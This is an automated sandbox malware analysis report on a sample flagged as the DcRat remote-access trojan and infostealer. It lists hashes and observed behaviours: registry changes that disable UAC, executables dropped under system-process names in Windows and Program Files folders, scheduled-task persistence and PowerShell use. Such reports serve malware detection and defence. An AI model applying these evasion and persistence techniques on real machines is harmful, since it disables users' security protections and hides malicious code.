SHA256 966def9e0ac621d7f15ce7dd6d7819fcc3be8d3202f564a29d5d6fc17aecdb0f
SHA512 22068df16ca472e96a0c4fa05e8c37f71f71ee8f382c5767b3050cf106ef09d3d7ac3b7bb5ca6eddff1072131cc451aeb3046de239df8aa09b30f39b91ea3812

C:\Users\Admin\AppData\Local\Temp\82436d53-5309-40f3-ac36-a474d00d2904.vbs

MD5 723ab8a3ff7d35ef61be780666977299
SHA1 cbfd0b1f2af3d8b3c58d8ccc9c9ded007730f362
SHA256 5af77708f82c7dba36f6ea946165df1e338d6e1583f1e2514773b37b37919740
SHA512 bfa61488798ab0e14a24bc692261e3950ae9c369529c12be20c5ca7bc19084654026f8c46342c929aa74d9077b2e44a49b6b2eb20ee18ad846476f58c4b11355

C:\Users\Admin\AppData\Local\Temp\253cfe41-456b-4717-828b-437aed799842.vbs

MD5 084bda8846a94ddeef39f7b26f144eff
SHA1 b964d0737e9fd47f4d7b5178b9771097fc2c0f35
SHA256 29a152012198221e85069de7c6f8ce93520b7c982305c0f5b36cc3d09bc0b11a
SHA512 6e12c0402fd2193f2813161fb0caa2c2599086f2f2d1b887ace7d8446857549dd3318f9113ee477f59d8168266f52b6a2cee6b1b32622ef8e77c02dc33a5ea6d

C:\Users\Admin\AppData\Local\Temp\a51755b3-c6df-49e0-84af-fe8af15f789c.vbs

MD5 65ccb9147cc9900deaa2a69505bc49b7
SHA1 39dc7e382672396387fe948d483cbd610952eb42
SHA256 9cabc068ba637f4fa74527f02fdd2e200ac59d60fd8852531460893e8c0e38ee
SHA512 6d46cfa2a282a3d8e98d6ae39f340652be04bd076afe21bda665afa33642ee1429ed7eb5924bbf928a9bb77601a08b5611e5a98a5813818efcb6085fe247d03e

C:\Users\Admin\AppData\Local\Temp\b8f0c640-1635-45c6-9063-0d28594d2599.vbs

MD5 9abd9041435a9a1662da5781f087544c
SHA1 440457fb568926a0466cdd02740d42df41dd2c4a
SHA256 b277f2c28447a162d33d25f98dc1c346af688192cc450aa163b9fd3b3e1f6953
SHA512 99103fbaebb22e79b5b28297fed2ea8fb9c4294531f92afa00399e98a257d90de6afe2339c1381e5b1773b67b24d1188f8e30203c049b689215530b2ad5f5db9

C:\Users\Admin\AppData\Local\Temp\2dd08480-8628-4cee-9175-699b2c66e957.vbs

MD5 dea094c89327c1a808c6b03204fec474
SHA1 3e571b0c5b4902768f4b3284f67cb5183b592e8e
SHA256 066716605382ea79189b55f7cce2a499b71db683f94507cde0ebb338f0661d59
SHA512 ec25f852aead5c86c5ef699708887411d1ec18ceacb06ddee930dc49074339b1b45018e29302587f4e66f6312c5401b9a9578252d7297d24ce9540e46c3f5799

C:\Users\Admin\AppData\Local\Temp\9251f47c-65a6-4c9d-a482-2abb570dde81.vbs

MD5 749ff186579355df3cdbfb661e2274b1
SHA1 b3ddc957afa29e3f4f1e3e6afc2e0a184643624b
SHA256 9867401ac07a54391e088079f1e2818b527fa674ad2c75df993e39a4fa63febe
SHA512 27f2960818ea6a64ec2744f61dfe87ae3e61efef905ec1ef190414428a5ac2b2a9e4415bba9cad67acc5d12debfa892c3543374c6ce55d96acfd4d0a1ec3c7b6

C:\Users\Admin\AppData\Local\Temp\0c46e484-0032-424b-92cf-c0b0f37b9fc9.vbs

MD5 154819491185874064c767d305e2eab4
SHA1 fca4bedf5e7b6698c45c3773676a6d915da28c3b
SHA256 9ce4378ecfd00b3baaba3d624b01eee1fe27b84208844842d4c8d697bc4bfb2a
SHA512 2fcb19db7f62b522dda634fcb24ac6c62b671a58f48d3c9d01feec1a97021156690e4084db8c655db67335afdf0f0c8f363bfebf0baccd36c55b387242e4a30b

C:\Users\Admin\AppData\Local\Temp\e4b73624-ddb4-4c31-8677-d0856c66f541.vbs

MD5 bbe489cf2fb9fd19825a267868cd4837
SHA1 50827a3cf4033385fbe711cbdbd97f2a6a1f05ea
SHA256 243380e433181ab5c8ac8c7221d3ab6aced2290284706aca85ed4c70b599a12b
SHA512 7aa7dc5a3059c012648692867b2745309b0fb99358cb19fca13f7395a648923606e672a112162c5586bd6f39818050ee3d7606ccb166ca120fc7990903f5518f

C:\Users\Admin\AppData\Local\Temp\e8697ec9-b9e3-439a-8b53-dbb4966a7231.vbs

MD5 e203d872550b3edbc19e33c970362f28
SHA1 3439b0a8d615edecc31e9ab21f3a1258ca3129ac
SHA256 1b9c328e94bb75dfce82d5b6eeea722e9f6df75a09951c91c88e1cb6401cb8b2
SHA512 9f990eedec706537f2392337c0c9cc39b88f23d0c9c67f8f4a881712f9171b3b3f22f1f44737572ee6e61b4c36f6c653ce5689b511ecff5d6c9343d73bb42da9

C:\Users\Admin\AppData\Local\Temp\a7f26326-349f-4229-b1e3-0ad737bc2fcc.vbs

MD5 e29ab1a66e95b15de4f3fab6241ad19c
SHA1 2c1ba3bfd234c03db393761947bf59c7c8891d86
SHA256 1c99f002f265f28c19fd2d1eb6573fdb0c05b0163ab537c29cd9827ad7f51217
SHA512 e812b972ff0cc24c47742b9193c64e6f25c465e03d08f4adc0b68c11a06337c2a9e8b16903ccf816dff4479c4f38ce1dbd8fc627f648ec19d611bc240e5190eb

C:\Users\Admin\AppData\Local\Temp\f7daee9d-82b9-4f22-a005-16c8163551ed.vbs

MD5 56f85821cb29ab7f4699d7dab7210628
SHA1 b4ee699e9619d1cf07f3b031bdd823488d8c555e
SHA256 79f46a7cb87b06faaba0abf9e7263b90c844edf2cc8c994a4118456e20634406
SHA512 50b88774700fbdb4673b1d1f17d9ce8250b995a4fafb985d465410961f58a7f4ce32d3ca3a940887ce95608d07423dd03987478e8606a3af4558e539b5c59ea9

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-16 01:57

Reported

2024-05-16 01:59

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe 64 occurrences

UAC bypass

evasion trojan
Description Indicator Process Target Count
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A 13 occurrences
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A 13 occurrences
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A 13 occurrences
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A 2 occurrences
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A 2 occurrences
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A 2 occurrences

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 22 occurrences

Checks computer location settings

Description Indicator Process Target Count
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A 2 occurrences
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A 13 occurrences

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\networklist\icons\sihost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\SysWOW64\networklist\icons\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\SysWOW64\networklist\icons\sihost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\cc11b995f2a76d C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\VideoLAN\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\VideoLAN\ea1d8f6d871115 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Uninstall Information\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\5940a34987c991 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\121e5b5079f7c0 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Windows Media Player\Icons\SppExtComObj.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\eddb19405b7ce1 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX455B.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Uninstall Information\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Uninstall Information\ea1d8f6d871115 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCX4B69.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\VideoLAN\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\L2Schemas\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\it-IT\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\OCR\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Offline Web Pages\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\RCX3ED0.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Offline Web Pages\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Offline Web Pages\5940a34987c991 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\it-IT\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\L2Schemas\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\CSC\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\it-IT\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\SystemResources\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\29c1c3cc0f7685 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
